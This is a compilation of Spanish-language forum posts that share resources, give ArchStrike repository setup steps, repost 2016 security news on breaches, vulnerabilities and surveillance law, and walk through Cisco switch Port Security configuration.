Les dejo este documento sobre posicionamiento web. Espero que les sea útil.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Un saludo, HATI 

He visto que no hay mucho material sobre el tema en el foro, asique dejo este temario sobre desarrollo de videojuegos de la Universidad de Castilla la Mancha.



1.- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

2.- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

3.- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

4.- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.



Un saludo, HATI 

En muchas ocasiones hemos hablado ya de distintas distribuciones basadas en Linux desarrolladas especialmente para llevar a cabo auditorías de seguridad y pruebas de pentesting para todo tipo de sistemas. Aunque la mayoría de ellas tienen las mismas aplicaciones, el sistema operativo base y las herramientas adicionales son lo que las diferencia entre ellas, permitiendo así a los usuarios elegir la que más sencilla les resulte de utilizar y mejor se adapte a sus necesidades.

ArchStrike, conocida hasta ahora como ArchAssault, es una distribución basada en Arch Linux creada y mantenida por un grupo de hackers y expertos de seguridad con el fin de ofrecer a los usuarios una suite de herramientas gratuitas y de código abierto para realizar auditorías de seguridad y tests de penetración junto a un aspecto minimalista 100% Arch.

Los responsables de ArchSrtike aseguran que su distribución está pensada para proteger la libertad de expresión, la privacidad y el anonimato en Internet, algo que cada vez es más complicado de mantener. Esta distribución cuenta con más de 1450 aplicaciones diferentes incluidas en los propios repositorios de la distribución.

Esta distribución se puede considerar como una alternativa directa a la conocida y prestigiosa Kali Linux, anteriormente conocida como BackTrack. Esta cuenta con soporte para las principales arquitecturas de hoy en día (32 bits, 64 bits, ARMv6 y ARMv7) y cuenta con OpenBox como gestor de ventanas ligero por defecto, aunque cualquier usuario puede añadirle cualquier capa de personalización superior siempre y cuando está disponible para sistemas Arch.


Cómo añadir los repositorios ArchStrike a cualquier Arch Linux

A la espera de la llegada de la ISO del sistema operativo como tal, a continuación, vamos a explicar cómo podemos utilizar las herramientas de ArchStrike en cualquier distribución basada en Arch Linux. Para ello, lo primero que debemos hacer es editar el fichero "/etc/pacman.conf" de nuestro sistema operativo y añadirle al final:

    [archstrike]
    Server = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Actualizamos la base de datos de software con "pacman -Syy" y listo.


Instalar el Keyring y los demás paquetes necesarios y configurar el repositorio

Iniciamos el keyring de Pacman y dirmngr y le añadimos la clave de ArchStrike:

    pacman-key –init
    dirmngr < /dev/null
    pacman-key -r F32D93DA
    pacman-key –lsign-key F32D93DA

Y a continuación instalamos los dos paquetes necesarios:

    pacman -S archstrike-keyring
    pacman -S archstrike-mirrorlist

Por último, volvemos a editar el fichero "/etc/pacman.conf" y modificamos la línea:

    [archstrike]
    Server = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Por:

    [archstrike]
    Include = /etc/pacman.d/archstrike-mirrorlist

Aprovechando que tenemos el fichero abierto, podemos añadir los repositorios "testing" añadiendo, por último:

    [archstrike-testing]
    Include = /etc/pacman.d/archstrike-mirrorlist

Ya tenemos todo listo. Lo único que nos queda por hacer es actualizar los repositorios de nuevo con "pacman -Syy" y ya tendremos nuestro Arch Linux con los repositorios oficiales de ArchStrike. Para ver la lista de aplicaciones disponibles simplemente debemos teclear:

    pacman -Sl archstrike
    pacman -Sl archstrike-testing

Podemos conseguir más información sobre este proceso y sobre sus herramientas y funciones en su Wiki oficial.

Las versiones ISO de esta nueva distribución ya preparadas para montar y ejecutar estarán disponibles en las próximas semanas, por lo que, de momento, lo único que podemos hacer es instalar un sistema operativo basado en Arch Linux y, utilizando los repositorios, descargar e instalar las herramientas que necesitemos.




Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

LeakedSource, un servicio que guarda una base de datos de cuentas filtradas, ha confirmado que ha añadido a la base de datos cerca de 427 millones de contraseñas de la red social. Desde MySpace no han emitido ningún tipo de información al respecto, al menos de momento, pero de confirmarse nos encontramos ante uno de los hackeos y robos de información más importantes en la historia de Internet.


El servicio ha aplicado minería de datos a los datos subidos y ha permitido extraer algunas cifras muy curiosas, como por ejemplo las contraseñas más utilizadas o el listado de dominios en lo referido a cuentas de correo y el correspondiente número de usuarios. También han explicado que aunque son 427 millones de cuentas solo poco más de 360 millones de credenciales son válidos y poseen información asociada a la cuenta. Con esto se quiere decir que muchos entradas de la tabla solo poseen el usuario, o la contraseña o bien información adicional pero sin las credenciales de acceso. A pesar de todo sigue siendo una cifra muy a tener en cuenta.

Los responsables de LeakedSource recibieron los datos a través de un usuario anónimo de Jabber, el cual confirmó que la base de datos ya está a la venta en el mercado negro.

De nuevo aparece un problema muy común: varios servicios afectados. Los usuarios tenemos la mala costumbre de reutilizar las contraseñas y eso repercute de forma negativa cuando se produce un problema de estas características, ya que ahora se deberá cambiar la contraseña de este y otros servicios para evitar un problema de seguridad mayor.

Credenciales cifrados pero accesibles

Antes hemos mencionado la minería de datos aplicada a los datos, algo que no habría sido posible en el caso de las contraseñas si no se hubiese accedido a esta información. Sí que es verdad que este dato está cifrado haciendo uso de SHA1 pero esto no ha evitado para que los responsables del servicio hayan accedido a una amplia mayoría, por lo que el almacenamiento de las contraseñas de este servicio no es para nada seguro.

Tengo una cuenta en MySpace: ¿debo tomar alguna medida?

Por el momento los responsables del servicio no han emitido ningún tipo de comunicado para confirmar o desmentir lo sucedido, aunque todo parece indicar que se trata de un fallo de seguridad que ha dejado expuesta una gran cantidad de información, entre ella las credenciales de acceso de las cuentas de usuario.

Por este motivo, la mejor medida que se puede tomar es modificar las contraseña que se tiene en la cuenta del servicio MySpace, evitando de esta forma que la cuenta pueda utilizarse de forma no autorizada.


Fuente:redeszone.net

En las últimas horas se ha dado aviso de un fallo grave de seguridad en WordPress que afecta a su famoso módulo Jetpack y que habilita el robo de las credenciales de usuario ante cualquier atacante externo. Se urge que todos los administradores web que tengan activado este popular módulo lo desactiven o bien actualicen a su versión corregida.

Jetpack es, posiblemente, el plug-in más popular del que suelen hacer uso los administradores de webs bajo el sistema de software de gestión de contenido Worpdress. Este plug-inañade distintos extras al panel de control de WordPresspara una mejor administración y funciones mediante unos módulos que se pueden ir activando de manera independiente.

Jetpack está desarrollado por Automatic, la misma empresa tras WordPress, y tras conocerse el fallo de seguridad, ya se encuentra disponible una actualización que todo usuario debe acatar para no entrar en riesgos. La firma de investigación Sucuri ha sido la encargada de dar la voz de alarma tras encontrar una vulnerabilidad XSS (stored cross-site scripting) que afecta a todos los Jetpack posteriores al 2012, exactamente desde la versión 2.0.


El fallo de seguridad se localiza en concreto en el módulo Shortcode Embeds Jetpack que permite la inclusión de vídeos externos, imágenes y documentos en los post y comentarios. Lo que hace peligrosa a esta vulnerabilidad es que es fácilmente explotable mediante la inyección de código malicioso JavaScript permitiendo al atacante robar las cookies del usuario (incluidas las credenciales de acceso) o incluso redirigirlo a exploits.

Aunque no tengas el módulo Shortcode Embeds activado, es totalmente recomendable que se actualice a la nueva versión de Jetpack y WordPress para no arriesgarse con una vulnerabilidad que habría expuesto millones de páginas webs en todo el mundo.


Fuente:noticiasseguridad.com

Unos hackers atacaron la web de Tumblr en 2013, pero no fue hasta principios de mayo de este año cuando esta web se dio cuenta de que habían sido atacados, y recomendaron a sus usuarios cambiar las contraseñas. Ahora, al parecer, han descubierto que el ataque permitió acceder a los usuarios y contraseñas de 65.469.298 cuentas.


Troy Hunt, el gestor de la web Have I Been Pwned, que permite comprobar si tu cuenta ha sido hackeada mediante la introducción de tu email, ha hecho público el número de cuentas afectadas. Hoy han añadido a su base de datos los datos de las personas afectadas, por lo que puedes comprobar si te encuentras entre los afectados. Recordamos, además, que te puedes suscribir con tu email a la web para ser notificado en el caso de que tu correo aparezca en alguna de las bases de datos afectadas, y así cambiar tu contraseña con la mayor celeridad posible, y evitar perjuicios mayores.


Para tranquilizar, cabe señalar que las contraseñas a las que tuvieron acceso los atacantes estaban codificadas, en lugar de en texto plano. Las contraseñas se convertían a dígitos, y luego se añadían otros al azar. Según esto, los atacantes no pudieron descifrar las contraseñas, ni Tumblr ha hecho público qué algoritmo usaron para codificarlas. Según Peace, un hacker que asegura haber adquirido los datos en la deep web y que está intentando venderlos, Tumblr usó SHA1 para codificar las contraseñas, lo que, unido a los dígitos aleatorios añadidos al final, hace que sea muy dificil desencriptarlas. A efectos prácticos, lo único de lo que disponen ahora mismo los hackers es de la lista de emails con las contraseñas codificadas. Por ello, Peace sólo consiguió sacar 150 dólares por toda la información de la que disponía.

Aunque los ataques son muy concretos, es inquietante que se hayan sucedido en tan poco espacio de tiempo, ya que tenemos durante el último mes los ataques de LinkedIn y Adobe, donde se accedió a los datos de 164 millones y 152 millones de cuentas, respectivamente. Esto puede ser solo la punta del iceberg. Los ataques pueden venir de la misma fuente, o pueden ser varios grupos dispersos los que estén haciendo peligrar nuestras contraseñas. Recordamos también que es bueno tener distintas contraseñas para cada servicio, ya que, si tenemos la misma que en otro sitio, los hackers la probarán para intentar acceder a nuestra cuenta.


Fuente:adslzone.net

Cifra que al cambio actual equivale a unos 12,7 millones de dólares y que lo convierte en uno de los más grandes y rápidos de la historia.


Todo ocurrió en menos de tres horas y se vieron afectados cajeros automáticos de hasta 16 prefecturas del país del sol naciente, entre las que se encuentran Tokyo, Osaka, Fukuoka y Kanagawa, algo que pone en evidencia que todo estaba perfectamente planeado y calculado, hasta la hora de acción, y es que incluso se produjo en una franja horaria que hacia casi imposible una rápida intervención de seguridad que pudiera afectar al normal desarrollo del robo.

Como muchos sabréis los cajeros automáticos tienen un límite de cantidad diaria que se puede retirar con tarjetas. En España por ejemplo es de 600 euros y en Japón es de 100.000 yenes, pero esto era algo con lo que ya contaban los cibercriminales y cuya solución ya os hemos anticipado en el otro párrafo.

Para superar dicha limitación se lanzaron contra unos 1.400 cajeros repartidos por todo el país nipón, un plan que como vemos les salió a la perfección.

Según la información oficial todo ocurrió durante la madrugada del domingo 15 de mayo y se sabe que utilizaron datos de tarjetas de crédito robados al Standard Bank de Sudáfrica, aunque de momento se están intentando atar algunos cabos sueltos para aclarar detalles que todavía tienen a la policía japonesa bastante desconcertada.

En este sentido la colaboración entre las autoridades niponas y el Standard Bank será clave para iniciar una línea de investigación común, que podría empezar por intentar descubrir cómo consiguieron los cibercriminales los datos de las tarjetas de crédito.


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos a todos,

Estoy pensando en instalar Kali NetHunter en una tablet Nexus 7, ya que tengo la posibilidad de obtener una a buen precio.

Me gustaría saber si algún usuario ha usado esta plataforma para Android, y que opiniones tiene sobre ella.

HATI 

Encontré esto y me gustaría compartirlo, es un documental de dominio público que a mi parecer, debería ser más difundido, ya que creo que no es fácil encontrarlo en la red. Por eso se lo dejo aqui:




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En el link se puede visualizar el contenido y descargarlo.


Si el material es de alguien del foro, gracias por crearlo y compartirlo. 

Saludos HATI

Saludos, les dejo este PDF con información sobre todos los comandos de la herramienta NMAP.



DOCUMENTO: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Espero que les sirva, HATI 

Toda precaución es poca cuando descargas software de Internet. Los usuarios con más conocimientos lo tienen claro, pero aquellos a los que les falta algo de experiencia todavía son víctimas fáciles del malware.

Sin ir más lejos, la compañía Cisco, a través de su rama especializada en seguridad Talos, ha publicado un exhaustivo estudio donde apunta al desarrollador de software francés Tuto4PC como creador y responsable de la instalación de backdoors en 12 millones de ordenadores repartidos por países de todo el mundo, entre ellos España.

El documento publicado en el blog de Cisco Talos,extenso y muy detallado, explica punto por punto la investigación llevada a cabo a raíz de una alerta por el sospechoso crecimiento de resultados de "troyanos genéricos" en sus análisis periódicos de seguridad. Talos comprobó que dicho software tenía un comportamiento muy similar al de cualquier otro malware, y análisis posteriores dieron como resultado además que estaba instalado en aproximadamente 12 millones de ordenadores, con derechos de administrador. Esto quiere decir que el programa era capaz de recolectar información personal e instalar otros programas o lanzar ejecutables sin conocimiento del usuario – y bajo control total de un tercero.


La investigación de Talos

La filial de Cisco especializada en seguridad inició entonces una investigación a fondo de estos ejecutables, usando para ello una muestra de unos 7.000 ficheros, y empezando por una curiosa coincidencia: todos ellos tenían la palabra "wizz" en su nombre (wizzupdater.exe, wizzremote.exe, wizzInstaller.exe, wizzByPass.exe...), y apuntaban a los mismos dominios.

A continuación los investigadores sometieron los ejecutables a diversos análisis, descubriendo así su capacidad para detectar las medidas de seguridad presentes en el PC y así asegurarse de que podía funcionar de forma efectiva y sin ser descubierto – una característica propia del malware.


Las pruebas revelaron, entre otras cosas, que los ejecutables contenían infecciones para múltiples países (Estados Unidos, Australia, Japón, España, Francia, Nueva Zelanda y Reino Unido), y que tenían conexiones con un adware llamado OneSoftPerDay, propiedad de Tuto4PC, un desarrollador francés de software. Una vez instalado en el PC de la víctima, este adware era capaz de instalar y ejecutar programas sin permiso del usuario (como System Healer), y engañarle para hacerle creer que su ordenador estaba infectado – y que para arreglarlo era necesario pagar, claro. Un vistazo más exhaustivo permitió también descubrir la capacidad de los ejecutables de abrir backdoors o puertas traseras en el ordenador de la víctima.

Lo curioso, comentan desde Talos en su análisis, es que las comunicaciones entre el adware y el servidor con el que se conectaba estaban cifradas con AES256, pero sus creadores usaron una técnica de cifrado explicada en un foro de MSDN, con las mismas claves.

De esta forma, los investigadores de Talos sólo tuvieron que ir al foro de MSDN y copiar las claves para descifrar las comunicaciones. "Con tanto tiempo como pasaron en técnicas anti-sandbox y anti-análisis, los autores no parece que le dedicaran tanto tiempo y esfuerzo al cifrado, y simplemente copiaron y pegaron las claves de un blog de MSDN", comenta Talos en su análisis.


La respuesta de Tuto4PC

El resultado de la investigación, finalmente, apunta al desarrollador francés Tuto4P Ccomo responsable de la autoría y distribución de estos troyanos, capaces de abrir puertas traseras en todos aquellos ordenadores donde hayan sido instalados. "Basándonos en el estudio, creemos que es un caso obvio de software backdoor", concluye el artículo de Cisco Talos. "Como mínimo, es un programa potencialmente no deseado (PUP)".

No es la primera vez que esta compañía ha sido acusada de actividades sospechosas; en los últimos cuatro años, las autoridades francesas les han advertido sobre la instalación de software sin el consentimiento previo de los usuarios, pero hasta ahora han podido evitar multas u otras consecuencias peores.

La situación ante esta nueva acusación podría ser diferente, aunque Tuto4PC se ha apresurado a defenderse de las acusaciones de Cisco. En un comunicado enviado aSecurity Week, el CEO de la empresa, Franck Rosset, afirma: "El post de Talos se equivoca al describir Tuto4PC como una empresa de distribución de malware. Estamos trabajando con nuestros abogados para evaluar qué acción tomaremos en contra de la imagen incorrecta y negativa que Talos ha dado de nuestro negocio [...] Desde 2004 nuestro modelo de negocio es crear widgets y tutoriales para descarga gratuita, sujeta al acuerdo de aceptar la publicidad de un adware incluido en la descarga. Pero al contrario de los argumentos de Talos, nuestro negocio ha sido aprobado por las autoridades francesas y nunca hemos sido demandados por distribuir malware".


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El tema del iPhone de San Bernardino fue sólo el inicio, sabíamos bien que la batalla iniciada por el FBI en contra de Apple no se trataba solamente de algo que se olvidaría a los pocos días, ya lo hemos visto con otros casos que han salido a la luz pública, pero hoy se ha dado un nuevo y preocupante paso que afectará la privacidad de las personas no sólo en los Estados Unidos, sino también en otras regiones del mundo.



La Corte Suprema de los Estados Unidos ha aprobadomodificaciones a la llamada 'Regla 41', la cual otorga autoridad a los jueces para emitir órdenes de registro en ordenadores, smartphones, redes y cualquier otro dispositivo electrónico, algo que sólo aplicaba para la jurisdicción de cada juez, pero con estas nuevas modificaciones, cualquier juez en los Estados Unidos podrá emitir órdenes de registro para que el FBI pueda hackear dispositivos o redes prácticamente en cualquier lugar del mundo.



Un nuevo ataque a la privacidad

Anteriormente esta regla permitía que un juez, por ejemplo, en California, sólo emitiera órdenes de registro en dispositivos dentro de California, es decir, ningún juez podía autorizar hackeos de forma remota a dispositivos fuera de su jurisdicción, pero con este cambio las cosas cambian, porque ahora cualquier juez puede emitir órdenes de hackeo fuera de su autoridadsi la ubicación del dispositivo se desconoce o está usando algún tipo de software de anonimato tipo TOR.

Según la Corte Suprema de los Estados Unidos, estas modificaciones obedecen a una modernización en el código penal para adaptarse a esta nueva era digital, ya que se han encontrado con que más de un millón de usuarios usan software que oculta su identidad, como el caso de TOR, esto hace que los delincuentes puedan navegar sin que se conozca su ubicación.

Por supuesto esto ha levantado polémica donde la mayoría de las compañías tecnológicas, así como grupos por las libertades civiles, se oponen a tal medida, ya que en el fondo es un cambio que va en contra de las protecciones civiles que se declaran en la Constitución. Por su parte, el senador demócrata Ron Wyden ha enviado un comunicado:

"Estas modificaciones tendrán consecuencias significativas en la privacidad de los estadounidenses y dentro del alcance de los poderes del gobierno para llevar a cabo vigilancia remota y búsquedas en dispositivos electrónicos. Bajo las reglas propuestas, el gobierno ahora sería capaz de obtener una sola orden para acceder y buscar en miles o millones de ordenadores a la vez, donde en la mayoría de los casos se trata de dispositivos que pertenecen a las víctimas, no los autores, los 'ciberdelincuentes'."

El Congreso de los Estados Unidos tiene hasta el 1 de diciembre de 2016 para rechazar los cambios o hacer modificaciones adicionales, si después de esta fecha nadie se opone, los cambios a la Regla 41 entrarán en vigor desde ese día.


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ayer 26 de abril se cumplieron 30 años de la catástrofe de Chernóbil, una explosión en una central nuclear que hasta hoy en día está considerada como el accidente nuclear más grave de la historia. Aunque, por fortuna, no hemos vuelto a lamentar un desastre semejante, hace unas horas la central nuclear alemana de Gundremmingen ha sido cerrada después de que se haya descubierto malware en uno de sus ordenadores, que llevaba ahí desde el año 2008.


Por el momento hay muchas cosas que no se han hecho públicas, como el tipo de malware, si se trata de Stuxnet o de una variación. La empresa responsable de la planta nuclear, RWE, asegura que no es nada serio, que el cierre ha sido por precaución y que no hay riesgo ni para los trabajadores ni para la población de Gundremmingen. El sistema afectado formaba parte de la cadena de carga del Bloque B, encargada de llevar el combustible usado desde el núcleo del reactor hasta la piscina de almacenamiento. Sin embargo, el ordenador infectado no controlaba directamente el sistema de carga, sino que formaba parte de los sistemas usados por los empleados.

Hasta ahora ningún empleado había notado nada raro en el sistema, lo que indica que el malware estaba "dormido", esperando la ocasión para activarse. También es posible que nunca se hubiese activado. El ordenador no estaba conectado a Internet, así que se sospecha que el malware entró en el sistema usando la memoria USB de algún empleado, que hubiese sido infectado en su ordenador de casa o en uno de los ordenadores conectados a Internet de la central.

Este problema llega en un mal momento para la planta de Gundremmingen, una de las más antiguas del país y cuyo cierre se planea para el 2021. El fin de semana pasado más de 700 personas protestaron en el lugar reclamando el cierre anticipado.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Desde la filtración de los documentos sobre espionaje mundial por parte de la NSA y el gobierno de Estados Unidos, la seguridad, la privacidad y el anonimato tienen cada vez una mayor importancia entre los usuarios de todo el mundo. Para garantizar la privacidad al conectarnos a Internet, uno de los primeros conceptos que debemos tener en cuenta es utilizar un sistema operativo seguro y privado, que no envíe datos a los usuarios, como es el caso de Tails.

Tails, acrónimo de The Amnesic Incognito Live System, es un sistema operativo basado en Debian cuya principal función es la preservar la seguridad y el anonimato de los usuarios aplicando una serie de medidas de seguridad como el cifrado de los datos y el reenvío de todas las conexiones por defecto a través de redes distribuidas como la red Tor.

Hace algunas horas, los responsables del desarrollo de este sistema operativo han liberado una nueva versión con la que solucionan los diferentes problemas detectados en la versión anterior y, además incluyen varias novedades y mejoras como vamos a ver a continuación.

¿Qué novedades incluye el nuevo Tails 2.3?

Una de las características más solicitadas por los usuarios, y que finalmente ha sido implementada, es la posibilidad de copiar y pegar las frases de seguridad de GnuPG desde el portapapeles a los cuadros de texto y viceversa. También se han actualizado varias aplicaciones críticas como, por ejemplo:

• Tor Browser a la versión 5.5.5.
• I2P a la versión 0.9.25.
• Electrum de la versión 2.5.4 a la nueva 2.6.3..

Esta nueva versión también mejora la herramienta Onion Circuits para ofrecer una vista mucho más cómoda de las rutas que recurren los datos a través de la red Tor y se pide que los usuarios que utilizaran en el pasado Claws Mail eliminen todos los datos de la aplicación de cara a acabar con un error persistente de configuración.

Tal como aseguran los responsables del proyecto, esta actualización soluciona varias vulnerabilidades y fallos de seguridad importantes, por lo que todos los usuarios deberían actualizar el sistema lo antes posible para poder seguir navegando de forma segura por la red. Esta nueva versión se puede descargar de forma totalmente gratuita desde No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Los desarrolladores de este sistema operativo anónimo ya han anunciado el desarrollo de su próxima actualización, Tails 2.4, la cual tiene prevista llegar a todos los usuarios el próximo 7 de junio.

¿Eres usuario de Tails? ¿Has descargado y preparado ya la nueva versión del sistema operativo privado y seguro?

Los expertos en seguridad de Bitdefender han localizado un fallo de seguridad en el proceso de registro de cuentas de la madre de las redes sociales que permite de forma indirecta el robo de las mismas en aquellas páginas que tengan activado el social plugin de Facebook. El proceso para aprovecharse de la vulnerabilidad es relativamente sencillo.


Durante el proceso de registro de la cuenta el usuario debe introducir dos cuentas de correo electrónico, una primera y otra secundaria. Es esta última la que el atacante puede manipular e introducir la suya, modificando el orden de las mismas cuando el proceso requiera la validación de la cuenta y enviando el código a la que es propiedad del ciberdelincuente y no la elegida por el usuario, considerando la red social que la cuenta ha sido verificada de forma correcta.

No se trata de la primera vulnerabilidad con este tipo de características, ya que en otras ocasiones hemos hablado de problemas similares pero que afectaban al proceso de recuperación de la cuenta. Aunque pueda parecer un proceso en el proceso de registro de la red social podría decirse que no es así, ya que el problema se encuentra en el social plugin que poseen muchas páginas activado. Aunque con anterioridad este solo permitía iniciar sesión y ver el timeline, desde hace un tiempo permite al usuario registrar una cuenta.

El problema es que este software podría permitir el robo de la identidad del usuario y proceder al secuestro de la cuenta.

Los responsables de Bitdefender han informado a la red social que pronto ha puesto una solución sobre la mesa para que esto no suceda, modificando la lógica del social plugin que habría provocado el robo de alguna cuenta según algunos medios.

¿Para qué sirve una cuenta de Facebook a los ciberdelincuentes?

Se trata de uno de los bienes más valiosos que los usuarios poseen en Internet y sin lugar a dudas posee un precio de oro en el mercado negro. Pero hay muchos que deciden utilizar estas para beneficiarse de determinados contenidos asociados a la misma o bien utilizar esta para distribuir algún tipo de virus informático, algo que resulta bastante común y eficaz, ya que los usuarios confían en que se trata de contenido legítimo y deciden acceder a él sin ningún tipo de reparo.

Por suerte el fallo ya no existe y los usuarios pueden utilizar el social plugin de Facebook sin ningún problema.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Durante los últimos meses hemos visto cómo Apple y el FBI se han enfrentado ante los medios, y ante los tribunales, una y otra vez por el caso del iPhone 5C del tirador de San Bernardino. El día 2 de diciembre de 2015 tuvo lugar una masacre en esta población de California, en un centro sin ánimo de lucro que atiende a personas con discapacidad de desarrollo.

Aunque tanto el tirador como su cómplice murieron durante un tiroteo posteriormente, la policía recuperó el iPhone del tirador. Desde entonces, el FBI ha intentado convencer a Apple para que desbloquease el terminal, pero la compañíase negaba a ofrecerle una puerta trasera a esta agencia federal, para evitar que tuviesen la forma de acceder a cualquier iPhone en el futuro.

Ante la negativa de Apple, que alegaba que de haber accedido a la petición habría puesto en riesgo la privacidad de todos sus dispositivos, el FBI buscó otras alternativas hasta que finalmente logró desbloquearlo. Para ello, tuvieron que pagar más de un millón de dólares a una empresa de seguridad cibernética de Israel, quienes lograron finalmente acceder al contenido del iPhone bloqueado.


Aunque no se reveló la cifra exacta, el director del FBI (James Comey) asegura que a esta compañía se le pagó más de lo que él ganará durante los próximos 7 años que estará en el puesto. Dado que el director de esta agencia federal gana 185.100 dólares al año, como mínimo la empresa de Israel se ha adjudicado 1,3 millones de dólares por romper la seguridad del iPhone y darles acceso.

Aun así, tras casi medio año de investigación, tratando de desbloquear el dispositivo, y manteniendo un proceso legal durante todo este tiempo, ni la insistencia del FBI ni el dinero que inviertieron les ayudaron a descubrir algo útil. De hecho, cuando la empresa israelí les dio acceso al terminal, no encontraron nada que pudiese ser de utilidad en la lucha antiterrorista, por lo que todo ha sido en vano.

De todos modos, el director del FBI confía en que, aunque no hayan logrado obtener información útil, todo esto les acabe llevando a una situación en la que en el futuro no sea necesario gastar tanto dinero y hackear un teléfono para lograr obtener la información que se guarda en él. ¿Acabará Apple cediendo algún día ante las presiones del Gobierno de los Estados Unidos? ¿O es posible que ya tuviesen acceso desde el principio como sugieren algunos medios?



Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Facebook Hackeado! El experto en seguridad de Orange Tsai de la firma DevCore había encontrado una Shell web maliciosa en un servidor de Facebook. El investigador estaba analizando la infraestructura del Facebook en cuanto observo un dominio llamado No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. quedo Intrigado,  el experto había tratado de acceder al dominio y de descubrir que se estaba hospedando en una instancia del appliance Accellion usado para transferencia de archivos.  Accellion.- es utilizado por empresas para transferencias de archivos seguras.

Una vez  accedido al dominio se mostró una interfaz de inicio de sesión para el dispositivo de transferencia de archivos a continuación, decidió investigar la presencia de vulnerabilidades de seguridad en el software.

Verificó que Facebook ya había  reparado el conocido fallo en el software,  entonces decidió buscar nuevos problemas de seguridad en el appliance Accellion. Es así como Tsai descubrió un total de 7 fallos de seguridad de día cero ( 0 Day ),  incluyendo cross-site scripting,  la ejecución remota de código arbitrario y la vulnerabilidad de elevación de privilegios locales esto es aun mas crítico para Facebook por el nivel de control que tenían sobre el servidor.


Tsaí Explotó una falla pre-auth de inyección SQL para cargar una WebShell al servidor de Facebook y ganar su control. En este punto, se dio cuenta de algo muy extraño, alguien le había anticipado la subida de un WebShell al servidor.

"Mientras él recogía datos de vulnerabilidad y evidencias para informar a Facebook, él había encontrado también algunas cosas extrañas en registro de Logs .  En primer lugar encontró un extraño mensaje de error  PHP "/var/opt/apache/php_error_log"  " Estos mensajes de error parecían estar causados por la modificación de los códigos en línea? "Escribió Tsai. "He seguido los caminos de PHP en mensajes de error y terminó con el descubrimiento de los archivos WEBSHELL sospechosos dejados anteriormente por otros visitantes".


En este punto, trató de recoger más datos relacionados con la supuesta intromisión y descubrió que el actor de la amenaza trató de recoger las credenciales de acceso de empleados de la compañía que utilizaron el Accellion  que es el Appliance de transferencia de archivos seguros.

El experto sostiene que los hackers mailciosos utilizaron un Script que había cosechado al menos 300 credenciales de  @facebook.com y  @fb.com en el período de tiempo comprendido entre el 1 de febrero y el 7 de febrero.

Mediante el análisis de los registros de los Logs  Tsai también descubrió que estos agentes de amenaza obtuvieron acceso en dos ocasiones al sistema, la primera vez en julio de 2015 y más tarde, en septiembre de 2015.

El acceso NO autorizado  se produjo en julio a pocos días antes de que la empresa  Rapid7 de a conocer dos vulnerabilidades en el Appliance Accellion de transferencia de archivos seguros.  Esta coincidencia genera cierta extrañeza.

Por supuesto, no hay ninguna evidencia de que los ataques de intrusión fueron llevados a cabo por el mismo hacker y cómo los atacantes violaron los sistemas que implementan la WebShell maliciosa.

Tsai informó de sus descubrimientos a Facebook quienes  admitían la existencia de la WebShell y lo premiaron con sólo  $ 10.000.  Él también informó de las fallas descubiertas en la plataforma Accellion a la compañia.


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Port Security es una función de los switches CISCO destinada a restringir el acceso a los puertos. Esto permite crear una política de seguridad en la capa 2 para evitar conexiones no deseadas, además teniendo cómo posibilidad realizar acciones en caso de que esto ocurra (security violation).
Lo que se quiere prevenir es un uso ilegítimo de nuestra red o evitar ataques realizados con direcciones MAC falsas.

Para explicar el uso de está característica trabajaremos a nivel de interfaz, accediendo al modo configuración, y luego al CLI.

Switch01# config terminal
Switch01(config)# interface FastEthernet 0/1
Switch01(config-if)#

Port-Security solo admite el mode access o el mode trunk, por lo que quedan descartadas configuraciones en mode dynamic desirable. Dependiendo de nuestra deberemos usar un modo u otro.

Switch01(config-if)# switchport mode access

Port-Security viene desactivado por defecto, asique deberemos activarlo.

Switch01(config-if)#switchport port-security

Tenemos la opción de limitar el número de direcciones MAC que tienen permitido el acceso a cada puerto. Por defecto es 1, por lo que no haría falta especificarlo, pero pongo el comando porque puede ser necesario su uso (en caso de la instalación de un telefono IP en el puerto del switch junto a una PC).

Switch01(config-if)#switchport port-security maximum 1

Una gran ventaja de está función, es la posibilidad de tomar medidas en caso de violación de la seguridad de un puertoes decir, que se conecte a la interfaz una MAC distinta a las permitidas.
Tenemos tres opciones a elegir:

• Protect: una vez que se alcanzó el máximo de direcciones MAC en un puerto, todo el tráfico de orígenes desconocidos (es decir, de direcciones MAC que no sean válidas para ese puerto) es descartado. No obstante, se continúa enviando el tráfico legal normalmente. No se notifica al administrador de esta situación.


• Restrict: el mismo comportamiento que el caso anterior pero con la diferencia que se envía un aviso al administrador mediante SNMP, se registra el evento en el syslog y se incrementa el contador de violaciones.



• Shutdown: en este caso el puerto se da de baja dejándolo en estado err-disabled (deshabilitado por error). Además se envía un aviso al administrador mediante SNMP, se registra el evento en el syslog y se incrementa el contador de violaciones.


• Shutdown VLAN: la única diferencia con el caso anterior es que se deshabilita la VLAN en ese puerto en lugar de dar de baja el puerto completo. Es particularmente atractivo para los puertos de trunk.

Switch01(config-if)# switchport port-security violation { protect | restrict | shutdown }

Ahora debemos seleccionar el modo en el que el switch guardará las direcciones MAC. Existen tres modos:

Dirección MAC segura estática

• Se configura manualmente.
• Se agrega a la tabla de direcciones MAC.
• Se guarda en la running-config.
• Se puede hacer permanente guardando la configuración.

   

 Switch01(config-if)# switchport port-security mac-address DIRECCION-MAC

   
Dirección MAC segura dinámica

• Se aprende del tráfico que atraviesa la interfaz.
• Se la guarda en la tabla de direcciones MAC.
• Se pierde cuando se reinicia el equipo.

   

Switch01(config-if)# switchport port-security

Dirección MAC segura sticky

• Se la puede configurar de forma manual o dinámica.
• Se la guarda en la tabla de direcciones MAC.
• Se almacena en la running-config.
• Se puede hacer permanente guardando la configuración.

